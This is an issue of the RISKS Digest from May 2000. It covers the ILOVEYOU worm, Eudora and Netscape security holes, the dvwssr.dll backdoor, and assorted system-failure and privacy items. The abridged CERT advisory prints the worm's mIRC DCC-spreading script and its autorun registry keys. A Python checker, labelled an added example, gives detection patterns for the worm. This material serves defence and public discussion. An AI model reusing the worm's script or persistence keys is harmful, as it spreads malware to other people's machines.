The Risks Digest

Forum on Risks to the Public in Computers and Related Systems

ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator

Volume 20 Issue 88

Sunday 14 May 2000

Contents

o Love Letter Worm, CERT Advisory CA-2000-04
CERT
o Mainstream media get a clue about Microsoft security
Russ Cage
o Peacefire: Eudora "Stealth Attachment" Security Hole Discovered
Bennett Haselton
o Netscape Navigator Improperly Validates SSL Sessions, CERT Advisory CA-2000-05
CERT
o FBI gun-check computer crashes
Declan McCullagh
o Risk: Selective denial of GPS signals
Mike Fisk
o Phone fault sparks sausage frenzy
Ian Simpson
o Network trashcan
Conrad Heiney
o Stupid appliance ideas
Lloyd Wood
o netzero: defenders of the free world?
Laurentiu Badea
o Re: Security experts discover rogue code in Microsoft software
Russ Cooper
o Re: Encryption code protected by First Amendment
Terry Carroll
o Re: Hotmail wants to know...
Jon Ribbens
o Re: No, Virginia
Mark Brader
o Info on RISKS (comp.risks)

Love Letter Worm, CERT Advisory CA-2000-04

CERT Advisory <cert-advisory@cert.org>
Thu, 4 May 2000 20:43:48 -0400 (EDT)
  [Always check the CERT Web site for updates on any CERT Advisory that
  is included in RISKS.  This item is a starkly abridged version of the
  original Advisory 2000-04.  Subsequent to the first appearance of
  ILOVEYOU, there have been numerous copycat variants, and assessments
  of damage on the order of many billion dollars.]
     [HOWEVER, please take a look at my written testimony on ILOVEYOU and
     its wider implications, which I submitted to the House Science Committee
     Subcommittee on Technology on 10 May 2000, Risks in Our Information
     Infrastructures: The Tip of a Titanic Iceberg Is Still All That Is
     Visible --
       http://www.csl.sri.com/neumann/house00.html
     PGN]

CERT Advisory CA-2000-04 Love Letter Worm

   Original release date: May 4, 2000
   Last revised: --
   Source: CERT/CC

Systems Affected

 * Systems running Microsoft Windows with Windows Scripting Host enabled

Overview

   The "Love Letter" worm is a malicious VBScript program which spreads
   in a variety of ways. As of 2:00pm EDT(GMT-4) May 4, 2000 -- the CERT
   Coordination Center has received reports from more than 250 individual
   sites indicating more than 300,000 individual systems are affected. In
   addition, we have several reports of sites suffering considerable
   network degradation as a result of mail, file, and web traffic
   generated by the "Love Letter" worm.

I. Description

   You can be infected with the "Love Letter" worm in a variety of ways,
   including electronic mail, Windows file sharing, IRC, USENET news and
   possibly via webpages. Once the worm has executed on your system, it
   will take the actions described in the Impact section.

Electronic Mail

   When the worm executes, it attempts to send copies of itself using
   Microsoft Outlook to all the entries in all the address books. The
   mail it sends has the following characteristics:
     * An attachment named "LOVE-LETTER-FOR-YOU.TXT.VBS"
     * A subject of "ILOVEYOU"
     * A body which reads "kindly check the attached LOVELETTER coming
       from me."

   People who receive copies of the worm via electronic mail will most
   likely recognize the sender. We encourage people to avoid executing
   code, including VBScripts, received through electronic mail regardless
   of the sender without firsthand prior knowledge of the origin of the
   code.

Internet Relay Chat

   When the worm executes, it will attempt to create a file named
   script.ini in any directory that contains certain files associated
   with the popular IRC client mIRC. The script file will attempt to send
   a copy of the worm via DCC to other people in any IRC channel joined
   by the victim. We encourage people to disable automatic reception of
   files via DCC in any IRC client.

Executing Files on Shared File Systems

   When the worm executes, it will search for certain types of files and
   replace them with a copy of the worm (see the Impact section for more
   details). Executing (double clicking) files modified by other infected
   users will result in executing the worm. Files modified by the worm
   may also be started automatically, for example from a startup script.

Reading USENET News

   There have been reports of the worm appearing in USENET newsgroups.
   The suggestions above should be applied to users reading messages in
   USENET newsgroups.

II. Impact

   When the worm is executed, it takes the following steps:

Replaces Files with Copies of the Worm

   When the worm executes, it will search for certain types of files and
   make changes to those files depending on the type of file. For files
   on fixed or network drives, it will take the following steps:
     * For files whose extension is vbs or vbe it will replace those
       files with a copy of itself.
     * For files whose extensions are js, jse, css, wsh, sct, or hta, it
       will replace those files with a copy of itself and change the
       extension to vbs. For example, a file named x.css will be replaced
       with a file named x.vbs containing a copy of the worm.
     * For files whose extension is jpg or jpeg, it will replace those
       files with a copy of the worm and add a vbs extension. For
       example, a file named x.jpg will be replaced by a file called
       x.jpg.vbs containing a copy of the worm.
     * For files whose extension is mp3 or mp2, it will create a copy of
       itself in a file named with a vbs extension in the same manner as
       for a jpg file. The original file is preserved, but its attributes
       are changed to hidden.

   Since the modified files are overwritten by the worm code rather than
   being deleted, file recovery is difficult and may be impossible.

   Users executing files that have been modified in this step will cause
   the worm to begin executing again. If these files are on a filesystem
   shared over a local area network, new users may be affected.

Creates an mIRC Script

   While the worm is examining files as described in the previous
   section, it may take additional steps to create a mIRC script file. If
   the file name being examined is mirc32.exe, mlink32.exe, mirc.ini,
   script.ini or mirc.hlp, the worm will create a file named script.ini
   in the same folder. The script.ini file will contain:

   [script]

   n0=on 1:JOIN:#:{
   n1=  /if ( $nick == $me ) { halt }
   n2=  /.dcc send $nick DIRSYSTEM\LOVE-LETTER-FOR-YOU.HTM
   n3=}

   where DIRSYSTEM varies based on the platform where the worm is
   executed. If the file script.ini already exists, no changes occur.

   This code appears to define a script such that whenever the user joins
   a channel in IRC, a copy of the worm will be sent to others on the
   channel via DCC. The script.ini file is created only once per folder
   processed by the worm.

Modifies the Internet Explorer Start Page

   If the file <DIRSYSTEM>\WinFAT32.exe exists, the worm sets the
   Internet Explorer Start page to one of four randomly selected URLs.
   These URLs all refer to a file named WIN-BUGSFIX.exe, which presumably
   contains malicious code. The worm checks for this file in the Internet
   Explorer downloads directory, and if found, it is added to the list of
   programs to run at reboot. The Internet Explorer Start page is then
   reset to "about:blank". Information about the impact of running
   WIN-BUGSFIX.exe will be added to this document as soon as it is
   available.

Send Copies of Itself via E-mail

   The worm will attempt to use Microsoft Outlook to send copies of
   itself to all entries in all address books as described in the
   Description section.

Other Modified Registry Keys

   In addition to other changes, the worm updates the following registry
   keys:

   HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
   HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
   HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX
   HKCU\Software\Microsoft\Windows Scripting Host\Settings\Timeout
   HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
   HKCU\Software\Microsoft\WAB\*

III. Solution

Update Your Anti-Virus Product  [...]
Disable Windows Scripting Host [...]
Disable Active Scripting in Internet Explorer [...]
Disable Auto-DCC Reception in IRC Clients [...]
Filter Virus in E-Mail [...]
Sendmail [...]
PostFix [...]
Procmail [...]
Exercise Caution When Opening Attachments [...]
Appendix A. Anti-Virus Vendor Information [...]

   [The full Advisory as updated is available from:
   http://www.cert.org/advisories/CA-2000-04.html]

CERT/CC Contact Information

  E-mail: cert@cert.org
          Phone: +1 412-268-7090 (24-hour hotline)
          Fax: +1 412-268-6989
          Postal address:
          CERT Coordination Center
          Software Engineering Institute
          Carnegie Mellon University
          Pittsburgh PA 15213-3890
          U.S.A.

   CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
   Monday through Friday; they are on call for emergencies during other
   hours, on U.S. holidays, and on weekends.

   Conditions for use, disclaimers, and sponsorship information [...]
   Copyright 2000 Carnegie Mellon University.

   [PGN-ed for RISKS.]
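
A defensive check for the indicators the advisory lists, as an added example (Python, not CERT's code): it matches the mail characteristics from the Electronic Mail section, the double-extension file names from the Impact section, and the DCC line written into mIRC's script.ini. The function names and the sample message are constructed for this example.

```python
"""Defensive indicator checks for the Love Letter worm (CERT CA-2000-04).
Added example for this RISKS issue, not CERT code: indicator strings are
taken from the advisory; function names and the sample mail are constructed."""
import email
import os
import re
from email import policy
from typing import Optional

# Mail characteristics listed in the advisory (Description / Electronic Mail).
MAIL_SUBJECT = "ILOVEYOU"
MAIL_ATTACHMENT = "LOVE-LETTER-FOR-YOU.TXT.VBS"

# Extensions the worm renames to .vbs (Impact / Replaces Files), so a hit
# on disk looks like "x.jpg.vbs" or "x.mp3.vbs".  Plain .vbs files are
# overwritten in place and cannot be told apart by name alone.
DOUBLE_EXT_RE = re.compile(r"\.(jpe?g|mp[23])\.vbs$", re.IGNORECASE)

# The on-JOIN DCC line the worm writes into mIRC's script.ini.
DCC_LINE_RE = re.compile(
    r"dcc\s+send\s+\$nick\s+.*LOVE-LETTER-FOR-YOU\.HTM", re.IGNORECASE)


def is_love_letter_mail(raw_message: bytes) -> bool:
    """True if a raw RFC 822 message carries either mail indicator from the
    advisory: the ILOVEYOU subject or the LOVE-LETTER-FOR-YOU.TXT.VBS
    attachment.  The body text is deliberately not used as an indicator."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    if (msg["subject"] or "").strip().upper() == MAIL_SUBJECT:
        return True
    for part in msg.walk():
        name = part.get_filename()
        if name and name.strip().upper() == MAIL_ATTACHMENT:
            return True
    return False


def classify_filename(path: str) -> Optional[str]:
    """Label a file name the worm would have produced, or None.  Only the
    basename matters; '/' is the separator on the scanning host."""
    base = os.path.basename(path)
    if base.upper() == MAIL_ATTACHMENT:
        return "worm-attachment"
    if DOUBLE_EXT_RE.search(base):
        return "media-file-replaced"
    return None


def script_ini_is_suspicious(text: str) -> bool:
    """True if mIRC script.ini content contains the worm's DCC send line."""
    return bool(DCC_LINE_RE.search(text))


# Constructed sample message (not a real capture) with both indicators.
SAMPLE_MAIL = b"""From: colleague@example.invalid
Subject: ILOVEYOU
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

kindly check the attached LOVELETTER coming from me.
--b1
Content-Type: application/octet-stream; name="LOVE-LETTER-FOR-YOU.TXT.VBS"
Content-Disposition: attachment; filename="LOVE-LETTER-FOR-YOU.TXT.VBS"

placeholder bytes standing in for the attachment
--b1--
"""

if __name__ == "__main__":
    print("sample mail flagged:", is_love_letter_mail(SAMPLE_MAIL))
    for name in ("photo.jpg.vbs", "notes.css", "LOVE-LETTER-FOR-YOU.TXT.VBS"):
        print(name, "->", classify_filename(name))
```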


Mainstream media get a clue about Microsoft security

Russ Cage <spherethis@yahoo.com>
Fri, 5 May 2000 10:01:20 -0700 (PDT)
In the flurry of news about the LoveBug virus, this article stands out:
http://news.bbc.co.uk/low/english/sci/tech/newsid_737000/737396.stm.
It represents one of the first mainstream media pieces to note that
the problem with computer viruses is enabled by Microsoft's designs
and wouldn't exist without them.

``Peter Sommer... told BBC News Online that Microsoft created these by
building in to their software the tools needed to customize applications.
Microsoft customers are going to have to ask the company to review very
carefully the level of functionality that they are putting into their
systems. [...]  One has got to ask why products are put out which contain
these programming languages, which may be of use to perhaps only 3 to 4% of
the customers but for everyone else presents a considerable threat.  [...]
These features are also very difficult to turn off. The lesson from Love Bug
is that people must be able to kill off this programming functionality
within applications programs."

Other experts from virus companies are quoted as deflecting the blame from
Microsoft, but their business interests depend on there being viruses to
stop.  If the Windows security model made it very difficult for viruses to
propagate, these companies would probably not exist any more.


Peacefire: Eudora "Stealth Attachment" Security Hole Discovered

Bennett Haselton <bennett@peacefire.org>
Thu, 27 Apr 2000 18:35:39 -0500
Peacefire has discovered a security hole in all versions of Eudora mail for
Windows, that can allow a hacker to execute code on a user's machine, by
sending the user e-mail and having them click on a link:

    http://www.peacefire.org/security/stealthattach/

(For example, a Eudora user would see this message with the URL above made
into a hyperlink so that you can click on it and load it into your browser.
Using the "stealth attachment" security exploit, you can force code to run
on the user's machine when they click on the link.  Don't worry, *this*
message is safe :-) But you can go to the above URL and request a
"demonstration mail" to be sent to you.)

Security holes that allow you to run code on a remote user's machine just by
sending them e-mail, are extremely dangerous -- a hacker could use this to
steal or erase any classified data on a remote user's hard drive, even if
that user were behind a corporate firewall and had anti-virus software
running.  A virus writer could use the exploit to write a virus that could
spread to almost all Eudora users -- numbering in the millions -- and
potentially do hundreds of millions of dollars' worth of damage.  (Unlike
most such tricks, this exploit does not require the user to do anything
"naive", like run an .exe that is sent to them as an attachment.)  USA Today
reported last year on the "BubbleBoy" virus, which similarly used a security
hole in Microsoft Outlook to cause code to run on a user's machine, simply
by reading an e-mail message:
http://www.usatoday.com/life/cyber/tech/ctg633.htm

Unfortunately, unlike the security hole that Peacefire discovered last
week:
        http://www.peacefire.org/security/jscookies/
    http://news.cnet.com/news/0-1005-200-1717169.html
    http://www.zdnet.com/zdnn/stories/news/0,4586,2553337,00.html
    http://www.ntsecurity.net/go/load.asp?iD=/security/netscape2.htm

this security hole doesn't involve any cool industry buzzwords like
"javascript" or "cookies".  This one just involves -- *YAWN* --
e-mail.  That is, like, *so* 20th-century.  Sorry if this is inconvenient
for journalists writing about this stuff :-)

bennett@peacefire.org     (425) 649 9024      http://www.peacefire.org


Netscape Navigator Improperly Validates SSL Sessions, CERT Advisory CA-2000-05

CERT Advisory <cert-advisory@cert.org>
Fri, 12 May 2000 15:06:11 -0400 (EDT)
CERT Advisory CA-2000-05
Netscape Navigator Improperly Validates SSL Sessions

   Original release date: May 12, 2000
   Source: ACROS, CERT/CC  [...]

Systems Affected

     * Systems running Netscape Navigator 4.72, 4.61, and 4.07. Other
       versions less than 4.72 are likely to be affected as well.

Overview

   The ACROS Security Team of Slovenia has discovered a flaw in the way
   Netscape Navigator validates SSL sessions.

   [The complete CERT Advisory is available from:
     http://www.cert.org/advisories/CA-2000-05.html
   PGN-ed for RISKS]


FBI gun-check computer crashes

Declan McCullagh <declan@well.com>
Sat, 13 May 2000 11:51:37 -0400
http://www.wired.com/news/print/0,1294,36310,00.html

The FBI's Interstate Identification Index database system crashed on 11 May,
preventing background checks of some 100,000 would-be gun purchasers who
have to be vetted by the National Instant Check System.  The crash also
prevented use of the Integrated Automated Fingerprint Identification System
associated with the National Crime Information Center NCIC 2000.  Service
expected to return on 14 May.  [The U.S. General Accounting Office notes
that NICS was offline for 215 hours from November 1998 to November 1999.]
[PGN-ed]


Risk: Selective denial of GPS signals

Mike Fisk <mfisk@lanl.gov>
Mon, 1 May 2000 17:44:03 +0000 (GMT)
President Clinton announced today that the US government will no longer use
its "Selective Availability" feature to degrade the precision of
measurements possible with civilian (and non-US government) Global
Positioning System (GPS) receivers.  One of the concerns cited in the
announcement is the ability to use GPS for emergency response and other
critical, civilian uses.

It is also stated that one of the reasons the US is comfortable making this
change is that it has "demonstrated the capability to selectively deny GPS
signals on a regional basis when our national security is threatened."

The risks: Will this lead to more dependence on a system that may be made
unavailable at any time?  For example pilots, outdoor enthusiasts, and
rescue services all use GPS for routine navigation.  If that signal was
suddenly made unavailable, would these people still have the necessary
skills to navigate using non-GPS techniques such as map and compass and
terrestrial radio beacons?  What about fail-over in automatic computer
systems (such as autopilots) that depend on GPS?

The full announcement is available at the following URL:
    http://www.igeb.gov/sa/potus.txt

Mike Fisk, RADIANT Team, Network Engineering Group, Los Alamos National Lab
See http://home.lanl.gov/mfisk/ for contact information


Phone fault sparks sausage frenzy

"Ian Simpson" <ian.g.simpson@btinternet.com>
Thu, 4 May 2000 18:54:25 +0100
Alison Mckenzie, of Peterhead, in Aberdeenshire, phoned a 24-hour
environmental services helpline after a chorizo sausage she had bought
turned out to be green.  As a result of a British Telecom system fault, the
call was automatically forwarded to police service voicebanks, but also in
text form to every BT pager number beginning with 01426.
  [Not green with envy, and certainly not environmentally green.
  Mayhaps it was an Irish chorizo?  As usual, the wurst is yet to come.
  PGN-ed from Ian's sources,
http://news2.thls.bbc.co.uk/hi/english/uk/scotland/newsid%5F735000/735531.stm
http://www.thisisnorthscotland.co.uk/scripts/edarticle-p.asp?section=National+news&ID=29726&source=NAT]


Network trashcan

"Conrad Heiney" <conrad@fringehead.org>
Fri, 28 Apr 2000 15:22:28 -0700
A friend of mine works for [Huge Corporation], where security is frequently
announced as being imperative. The operating system of choice is Windows NT,
and much work is shared on a networked "drive" type share. This "drive" has
a trashcan icon on it.

Fishing in said network trashcan results in the discovery of all sorts of
information, including Word documents with draft policies, the home
addresses of top executives, financial information, etc.

The RISK here is that people expect something that looks like a trashcan to
behave like one, and behave accordingly. The Memory Hole has become a
security hole.

-- Conrad Heiney conrad@fringehead.org http://fringehead.org/

  [Ah, yes, that is just like your home trashcans.  Publically
  available.  You have no idea what dumpster diving can go on
  after you put something in it.  Don't forget all the deleted stuff
  still in the Word file.  You need a bit shredder.  Cryptography?
  Still maybe not enough, but closer.  PGN]


Stupid appliance ideas

Lloyd Wood <l.wood@eim.surrey.ac.uk>
Sun, 7 May 2000 00:32:36 +0100 (BST)
Of late, there has been a surge in interest in networking domestic
appliances. Electrolux and Whirlpool plan ScreenFridges, where you can see
recipes and order food. Ariston has a washing machine with a built-in modem
which can telephone automatically for software upgrades for the programme
controller.

And now there's BT, with:
http://www.telegraph.co.uk/et?ac=000111464113065&pg=/et/00/5/7/ntac07.html
where domestic appliances are chipped and authorised for use by a home
management centre phoning your insurance company.

The failure modes here are legion. Move house, and discover that your
appliances no longer work while you enter a protracted discussion with your
insurance company to authorise your home management centre in its new
location (no doubt necessary to prevent the home management centre from
being stolen). Have your home management centre crash [Ariston has proposed
its kitchen centre be run on Windows CE], and watch it take out your entire
kitchen, denying you service in the process.

Not so much white goods ideas, as white jacket ideas. It's a recipe
for disaster.

plumb and play. hah.

<L.Wood@surrey.ac.uk>PGP<http://www.ee.surrey.ac.uk/Personal/L.Wood/>


netzero: defenders of the free world?

Laurentiu Badea <bytemare@lmn.pub.ro>
29 Apr 2000 17:19:10 -0700
The "Terms and Conditions" you must accept to use the "free" NetZero service
include giving up your privacy among other "minor" things:

1) obligation on your part to fill out with real information all
   questionnaires and survey forms they send;

2) allowing NetZero to learn your browsing habits by tracking all the websites
   you visit and compile, sell and USE that information.
   They say personal identifying info won't be disclosed, but just the simple
   fact that they store it on their system, where it is available to anybody who
   could lawfully or not access it, is a problem. Let alone they don't exclude
   themselves from using it, so it is possible for them to target you directly.

3) you cannot disable cookies, bypass their ad program (meaning that you can't
   install firewalling software that would block the ad stream)

4) you allow them to alter your e-mail messages by adding advertising which
   you cannot remove or obscure (not unusual);

5) the most ridiculous note is that the whole agreement can be changed at any
   time by posting them on their website, and require you to check them every
   time before you "use the service", and not use it if you don't agree. Let
   alone the impossibility of this (how can you browse their website without
   already being connected, thus using the service), it puts an unreasonable
   burden on the user. How many will remember the original contract and check
   the new one for differences? I doubt they would post a "diff" file there :-)

Laurentiu Badea


Re: Security experts discover rogue code in Microsoft software

Russ <Russ.Cooper@rc.on.ca>
Mon, 1 May 2000 08:51:05 -0400
It's extremely important to clarify this "Netscape engineers are weenies!"
story.

For a variety of reasons, one of which being my own quotes in the original
*Wall Street Journal* article on this issue, the public has been overly
warned against an extremely limited threat... while the real threat from the
dvwssr.dll has been largely ignored by the media.

First, clarification of the "secret backdoor password" threat.  The
possibility that the string above could be used to access the source of
Active Server Page (.asp) web files, or configuration files known as .asa,
is entirely dependent on the permissions configured on an IIS web server.
By default, no access can be gained.  If permissions are mis-configured,
allowing anonymous read access to the files (they should be permissioned for
anonymous *execute*, not read), then there is a way that the obfuscation
could permit access.  It should be noted that with such a mis-configured
system, numerous other access methods would be available also.

The important story overlooked was a discovery by CORE-SDI later in the
evening after the backdoor story had run virtually everywhere.

CORE-SDI, not more than 8 hours after first looking at the dvwssr.dll, was
able to publish details on a buffer overrun in that .dll that could permit
a DoS of IIS boxes.  By some other machinations (including moving the file to
a directory where it would not normally be found), they were able to execute
arbitrary code on the attacked box.

Everyone, RFP (whose advisory caused the original stir), CORE-SDI, and
Microsoft advised that the dvwssr.dll simply be deleted (from all of its
locations) in order to remedy the potential problem(s).

While this particular program had minimal use in its lifetime, the fact that
a static password (used for obfuscation, not entry) was even present should
not be understated. This program has survived numerous Q&A cycles and, if we
believe that source code for NT has been available at some 30+ U.S.
Universities for years, numerous code reviews.

Of interest to RISKS readers should be the fact that MS was, presumably,
unaware that it was using obfuscation for security in that program.

Russ - NTBugtraq Editor
"dot-age" (as in "we're in the dot-age") = senility (source Webster's)


Re: Encryption code protected by First Amendment

Terry Carroll <carroll@tjc.com>
Fri, 28 Apr 2000 19:57:23 -0700 (PDT)
On Wed, 05 Apr 2000, "NewsScan" wrote:

> A federal appeals court in Ohio has ruled that encryption software code is
> protected by the First Amendment because such code is a means of
> communication between computer programmers.

For those who want to read the court's opinion itself, it's online at
the Sixth Circuit Court of Appeals website.  The URL is
<http://pacer.ca6.uscourts.gov/cgi-bin/getopn.pl?OPINION=00a0117p.06>; a
PDF-formatted file (in two-up form intended for publication as a slip
opinion, so the pagination may look odd to you) is at
<http://pacer.ca6.uscourts.gov/opinions.pdf/00a0117p-06.pdf>.

The citation is Junger v. Daley, No. 98-4045 (6th Cir. Apr. 4, 2000).

The opinion is only 8 pages long, most of which simply relates the facts,
discusses the standard of appellate review, or states the resulting
order.  The analysis of source code as speech is remarkably short, on page
7, the gist of which is:

  The Supreme Court has expressed the versatile scope of the First
  Amendment by labeling as "unquestionably shielded" the artwork of
  Jackson Pollack, the music of Arnold Schoenberg, or the Jabberwocky
  verse of Lewis Carroll. ...  Though unquestionably expressive, these
  things identified by the Court are not traditional speech.
  Particularly, a musical score cannot be read by the majority of the
  public but can be used as a means of communication among musicians.
  Likewise, computer source code, though unintelligible to many, is the
  preferred method of communication among computer programers [sic].

  Because computer source code is an expressive means for the exchange
  of information and ideas about computer programming, we hold that it
  is protected by the First Amendment.

Terry Carroll, Santa Clara, CA <carroll@tjc.com>  "The United States is
  located in the District of Columbia."  Uniform Commercial Code s. 9-307(h)


Re: Hotmail wants to know... (Richards, RISKS-20.87)

Jon Ribbens <jon@oaktree.co.uk>
Mon, 1 May 2000 20:28:41 +0100
>The proof of adult status required? A credit card number.
>1) I refuse to give my credit card number for a non-purchase reason.

You may well find that your credit card Terms and Conditions forbid you
from giving your credit-card number to anyone for any reason other than
making a purchase.  Mine do.

Jon Ribbens / jon@oaktree.co.uk


Re: No, Virginia (Burstein, RISKS-20.86)

Mark Brader <msb@vex.net>
Fri, 28 Apr 2000 21:21:59 -0400 (EDT)
Danny Burstein writes:
> Permit me to point out that the famous letter, from Virginia O'Hanlon, was
> first printed in the *New York Sun* of 21 September 1897.

And in the letter, Virginia quotes her father as saying "if you see it in
the Sun, it's so".

The New York Sun is also the paper where a series of six articles in August
1835 told how astronomer John Herschel, using a great telescope of new (and
in fact impossible) design in South Africa, had observed amazing geological
formations and a great variety of life-forms on (and flying above) the
surface of the Moon...

Of course, this message is off-topic.  Questions such as how to determine
which information source to trust have no Risks relevance whatever. :-)

Mark Brader   "Never trust anybody who says 'trust me.'
Toronto       Except just this once, of course."   John Varley, "Steel Beach"
